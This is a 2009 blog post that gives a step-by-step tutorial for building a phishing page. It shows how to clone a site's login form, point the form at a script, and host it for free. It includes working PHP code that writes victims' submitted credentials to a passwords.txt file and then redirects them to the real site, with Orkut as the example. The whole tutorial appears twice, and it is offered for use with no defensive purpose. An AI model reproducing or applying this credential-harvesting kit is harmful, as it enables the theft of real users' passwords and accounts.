Friday, August 21, 2009
Create Your Own Phishing Site
Hello Friends
Tired Of Searching For Those Phishing Files
How About Making Your Own Latest Fake Page Of Any Site In Just Few Steps
Here Is The Tutorial
1. First Things First You Must Choose The Site Which You Wanna Make A Phisher From.
2. When You Found Your Site Right Click On It And Say "view source" And Save It On Desktop As index.html
3. Open The "index.htm" With Notepad And Press CTRL+F And Type action. You Should Find A Command Looking Like This
form action="RANDOM URL" method="post"
4.Change The Link After Word Action To write.php And Change The Word Post To Get, Which Is Close To The Word Method
Remember Dont Erase The Inverted Commas And Commas It Might Affect The Page
5. Save index.html
6. Time To Create A Free Website. It MUST SUPPORT .php Files So I Suggest The Use Of http://www.110mb.com. Create A Free Website.
This Is Just An Example You Can Find Much More php Supported Sites
7. Login To Your Website And Go To "file manager"
8. Delete The File Thats Already There Called "index.htm" And Upload Your "index.htm" (The One You Just Made)
Note: Put This Symbol < In The Start Of This Code Before ?php
9. Create A New File Called "write.php" And Copy / Paste This:
?php
header("Location: http://RANDOM");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
10. Switch Out The Word "RANDOM" With The Site The Browser Should Go To After Victim Wrote His/Her Password. So It Should Say Like This:
header("Location: http://orkut.com ");
You Might Want To Change The Textfile Name So Others Wont Be Able To View The File.
11. Save This File write.php, And Upload It To The Subdomain Aswell
12. Test Out Your Website. Type In Something In Your Phisher And Then Go To Filemanager And Open The Password File, What You Wrote Should Be Typed Here!,
ENJOY!!!!
Tired Of Searching For Those Phishing Files
How About Making Your Own Latest Fake Page Of Any Site In Just Few Steps
Here Is The Tutorial
1. First Things First You Must Choose The Site Which You Wanna Make A Phisher From.
2. When You Found Your Site Right Click On It And Say "view source" And Save It On Desktop As index.html
3. Open The "index.htm" With Notepad And Press CTRL+F And Type action. You Should Find A Command Looking Like This
form action="RANDOM URL" method="post"
4.Change The Link After Word Action To write.php And Change The Word Post To Get, Which Is Close To The Word Method
Remember Dont Erase The Inverted Commas And Commas It Might Affect The Page
5. Save index.html
6. Time To Create A Free Website. It MUST SUPPORT .php Files So I Suggest The Use Of http://www.110mb.com. Create A Free Website.
This Is Just An Example You Can Find Much More php Supported Sites
7. Login To Your Website And Go To "file manager"
8. Delete The File Thats Already There Called "index.htm" And Upload Your "index.htm" (The One You Just Made)
Note: Put This Symbol < In The Start Of This Code Before ?php
9. Create A New File Called "write.php" And Copy / Paste This:
?php
header("Location: http://RANDOM");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
10. Switch Out The Word "RANDOM" With The Site The Browser Should Go To After Victim Wrote His/Her Password. So It Should Say Like This:
header("Location: http://orkut.com ");
You Might Want To Change The Textfile Name So Others Wont Be Able To View The File.
11. Save This File write.php, And Upload It To The Subdomain Aswell
12. Test Out Your Website. Type In Something In Your Phisher And Then Go To Filemanager And Open The Password File, What You Wrote Should Be Typed Here!,
ENJOY!!!!

0 comments:
Post a Comment